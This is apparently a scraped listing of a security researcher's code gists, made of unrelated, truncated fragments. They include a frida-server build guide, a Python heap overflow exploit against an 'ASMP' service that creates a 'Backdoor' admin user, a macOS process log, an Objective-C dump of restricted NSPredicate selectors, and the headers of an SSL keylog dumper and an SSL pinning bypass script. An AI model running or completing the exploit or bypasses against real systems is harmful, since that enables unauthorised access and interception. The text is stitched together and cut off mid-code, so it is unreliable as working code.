ApkUnpacker apkunpacker

Here, I'll show you how to compile frida-server (≥ 16.2.2) for rootfull, rootless and RootHide jailbreaks.

Old Instructions

If you want to compile an old version of Frida (< 16.2.2) you can use my old guide.

Use this guide to integrate the O-MVLL obfuscator using WSL and command line
The guide has two parts, the first one explains the installation of Android build tools, the second part presents all the adjustments I needed to make to standard O-MVLL integration process (https://obfuscator.re/omvll/introduction/getting-started/). Read that 'Getting started' guide first.

sudo apt-get update

	import socket, struct, sys
	p32 = lambda x: struct.pack(">I", x)
	p16 = lambda x: struct.pack(">h", x)
	p8 = lambda x: struct.pack(">b", x)

	# ASMP heap overflow exploit creates new applianceAdmin user
	def exploit(hostname, username="Backdoor", password="Backdoor"):
	global socks # python closes out of scope sockets
	port = 3211 # port is hardcoded in the binary
	usernm = username.encode()

	jevin@wombat [22:32:18] [~/code/mac/widget/xnu_unsuspend] [main *]
	-> % sudo taskinfo 'Deliveries Widget'
	process: "Deliveries Widget" [30145] [unique ID: 1220404]
	architecture: arm64
	coalition (type 0) ID: 105936
	coalition (type 1) ID: 591
	suspend count: 1
	virtual bytes: 389.40 GB; phys_footprint bytes: 8.92 MB; phys_footprint lifetime maximum bytes: 8.92 MB
	run time: 42 s
	user/system time (current threads): 0.046565 s / 0.036279 s

	// dump classes and selectors forbidden in NSPredicates
	// `cc -framework Foundation -o restricted restricted.m`
	#import <Foundation/Foundation.h>
	#import <dlfcn.h>

	int main() {
	void *cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", 0);
	NSDictionary* (*RestrictedClasses)() = dlsym(cf, "_CFPredicatePolicyRestrictedClasses");
	NSDictionary* (*RestrictedSelectors)() = dlsym(cf, "_CFPredicatePolicyRestrictedSelectors");
	NSLog(@"Restricted Selectors: %@", RestrictedSelectors());

	#!/usr/bin/env python3
	import json

	import frida
	from frida.core import Device, Session, Script, ScriptExportsSync

	compiler: frida.Compiler = frida.Compiler()
	compiler.on("diagnostics", lambda diag: print(f"on_diagnostics: {diag}"))
	bundle: str = compiler.build('permissions.ts', compression='terser')

	import threading

	from frida_tools.application import Reactor

	import frida


	class Application:
	def __init__(self):
	self._stop_requested = threading.Event()

	/**
	* Android, iOS (12.0-15.7.3), Linux universal SSLKEYLOG dumper.
	*
	* Usage:
	*
	* # For iOS and mac:
	* rvictl -s [UDID]
	* # Then open Wireshark and select rvi0
	*
	* # For iOS and not mac:

	console.log("[*] SSL Pinning Bypasses");
	console.log(`[*] Your frida version: ${Frida.version}`);
	console.log(`[*] Your script runtime: ${Script.runtime}`);

	/**
	* by incogbyte
	* Common functions
	* thx apkunpacker, NVISOsecurity, TheDauntless
	* Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
	* !!! THIS SCRIPT IS NOT A SILVER BULLET !!